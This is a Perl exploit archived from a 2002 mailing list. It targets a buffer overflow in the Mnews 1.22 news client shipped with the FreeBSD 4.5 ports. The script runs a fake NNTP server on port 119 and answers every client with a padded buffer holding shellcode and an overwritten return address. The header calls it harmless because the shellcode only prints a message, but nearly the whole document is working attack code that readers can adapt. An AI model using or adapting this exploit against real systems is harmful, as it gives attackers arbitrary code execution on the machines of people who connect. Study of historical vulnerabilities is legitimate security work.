#!/usr/bin/perl -w # # Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped # with the 4.5-RELEASE ports collection. # # This exploit is pretty harmless as it only prints a small message to # stdout (NAI?). # # Written by zillion[at]safemode.org (!shit) # # http://www.safemode.org # http://www.snosoft.com use IO::Socket; $shellcode = "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88". "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50". "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73". "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f". "\x23"; # normal \x90 nops don't work here.. $nop = "A"; $esp = 0xbfbff65e; $off = "-70"; $size = 762; for ($i = 0; $i < ($size - length($shellcode)); $i++) { $buffer .= "$nop"; } $buffer .= $shellcode; $buffer .= pack('l', ($esp + $off)); $buffer .= pack('l', ($esp + $off)); printf("Starting to listen for incoming connections... buffer size %d\n",length($buffer)); print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n"); my $sock = new IO::Socket::INET ( LocalPort => 119, Proto => 'tcp', Listen => 1, Reuse => 1, ); while($cl = $sock->accept()) { sleep 1; print $cl "200 $buffer\n"; sleep 3; }
This archive was generated by hypermail 2b30 : Sat Jun 01 2002 - 16:02:41 PDT